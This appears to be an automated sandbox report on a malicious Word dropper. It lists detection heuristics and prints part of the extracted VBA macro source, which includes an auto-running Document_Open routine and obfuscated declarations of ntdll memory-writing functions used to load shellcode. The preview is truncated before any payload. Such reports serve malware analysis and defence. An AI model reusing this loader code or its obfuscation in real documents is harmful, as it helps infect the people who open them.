Malware Insights
The sample is identified as malicious by ClamAV with the signature 'Doc.Dropper.Agent-6369142-0', indicating it functions as a dropper. The presence of a 'Document_Open' VBA macro strongly suggests that the malicious payload is executed automatically upon opening the document. While the VBA code is truncated, the declared functions like 'NtAllocateVirtualMemory' and 'NtWriteVirtualMemory' from 'ntdll.dll' point towards memory manipulation, a common technique for loading and executing shellcode or second-stage malware. The overall intent appears to be the execution of a malicious payload, likely downloaded from an external source, making it a spearphishing attachment.
Heuristics (4)
- ClamAV: Doc.Dropper.Agent-6369142-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.Agent-6369142-0
- VBA macros detected (medium, OLE_VBA_MACROS, 1 related finding): Document contains VBA macro code
- Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open macro
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://ns.adobe.com/xap/1.0/ (in document text, OLE body)
  - http://www.w3.org/1999/02/22-rdf-syntax-ns# (in document text, OLE body)
  - http://ns.adobe.com/photoshop/1.0/ (in document text, OLE body)
  - http://purl.org/dc/elements/1.1/ (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/mm/ (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/sType/ResourceEvent# (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/sType/ResourceRef# (in document text, OLE body)
  - http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 35330 bytes | 60e7549cf0e951de730826400a2ef45083bd8e1432527a51ca071ce5632e2296 |
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
Dim newspaper As Integer
Dim chignon As Variant
groundnut = "solicitor"
apollons.oriya
kishke = 90 + 4
Pmt 0, kishke, 16112, 47021, 6
End Sub
Attribute VB_Name = "cassiope"
#If (13 * 3 + 5) > (8 - 3 * 1) And Not (88 - 11 * 8) * 30 < (Win64) Then
' Ich warte hier
' Doch ich weiГџ dass es dich gibt
Public Declare Function roundsman Lib "Shlwapi.dll " Alias "SleepConditionVariableSRW" (ByVal cic As Any, combative As Any, bourgogne As Any, headsup As Any) As Long
' He comes to me every night
' Ich warte hier
Public Declare Function interception Lib "Shlwapi.dll " Alias "GetOverlappedResult" (ByVal bookish As Any, blister As Any, passionqueller As Any, mucoid As Any) As Long
' With his hands around my neck
' Sometimes love seems so far
Public Declare Function peerage _
Lib "ntdll " Alias _
"NtAllocateVirtualMemory" (truncated As Long, maestoso As Long, ByVal freudian As Long, highmindedByVal As Long, await As Long, ByVal energy As Long) As Long
' irgendwer mich liebt
' Die Nacht Г¶ffnet ihren SchoГџ
Public Declare Function medley _
Lib "ntdll " Alias _
"NtWriteVirtualMemory" (ByVal timeswitch As Any, ByVal veal As Any, ByVal lysimachus As Any, ByVal heraldic As Any, ByVal myctophidae As Any) As Long
' Die Nacht Г¶ffnet ihren SchoГџ
' Die Nacht Г¶ffnet ihren SchoГџ
Public Declare Function unfathomable Lib "Kernel32" Alias _
"CreateTimerQueueTimer" (discountenance As Any, ByVal calcine As Any, ByVal gymnura As Any, ByVal forthcoming As Any, ByVal antigropelos As Any, ByVal reestate As Any, ByVal revendicate As Any) As Long
' Die Nacht Г¶ffnet ihren SchoГџ
' Dont die before I do
#End If
' In my dreams he does exist
' Sometimes love seems so far
#If (13 * 3 + 5) > (8 - 3 * 1) And (88 - 11 * 8) * 30 < (Win64) Then
' His passion is a kiss
' Ich warte hier
Public Declare PtrSafe Function dysmenorrhea Lib "Shlwapi.dll " Alias "GetOverlappedResult" (ByVal barrage As Any, aphonia As Any, empress As Any, celtis As Any) As LongPtr
' I know that you exist
' I dont know who he is
Public Declare PtrSafe Function medley _
Lib "ntdll " Alias _
"NtWriteVirtualMemory" (ByVal flagellate As Any, ByVal epiphytic As Any, ByVal paleozoology As Any, ByVal clipboard As Any, ByVal bahamian As Any) As LongPtr
' I dont know who you are
' Sometimes love seems so far
Public Declare PtrSafe Function peerage _
Lib "ntdll " Alias _
"NtAllocateVirtualMemory" (drown As LongPtr, marriageability As LongPtr, ByVal bloodlessly As LongPtr, applicationsByVal As LongPtr, atrophic As LongPtr, ByVal ichthyolatry As LongPtr) As LongPtr
' Ich weiAY dass irgendwann
' Dont die before I do
Public Declare PtrSafe Function kris Lib "Shlwapi.dll " Alias "SleepConditionVariableSRW" (ByVal formerly As Any, shoddily As Any, avibus As Any, kalotermitidae As Any) As LongPtr
' Ich warte hier
' irgendwer mich liebt
Public Declare PtrSafe Function unfathomable Lib "Kernel32" Alias _
"CreateTimerQueueTimer" (affenpinscher As Any, ByVal unshaped As Any, ByVal borate As Any, ByVal bumpiness As Any, ByVal compages As Any, ByVal cello As Any, ByVal spergula As Any) As Long
' Doch ich weiAY dass es dich gibt
' Ich warte hier
#End If
Attribute VB_Name = "unobtrusive"
Attribute VB_Base = "0{F89CB859-E800-4982-91EA-E22374C77730}{49DE4848-A0DA-4E26-9BC2-07C4D593AA63}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "apollons"
Function gayety(unresolved, gingle, airmail)
#If (7 * 4 + 5) > (7 - 2 * 1) And (20 - 5 * 4) * 2 < (Win64) Then
Dim dolabriform As Byte
Dim feels As Variant
Dim mayaca
... (truncated)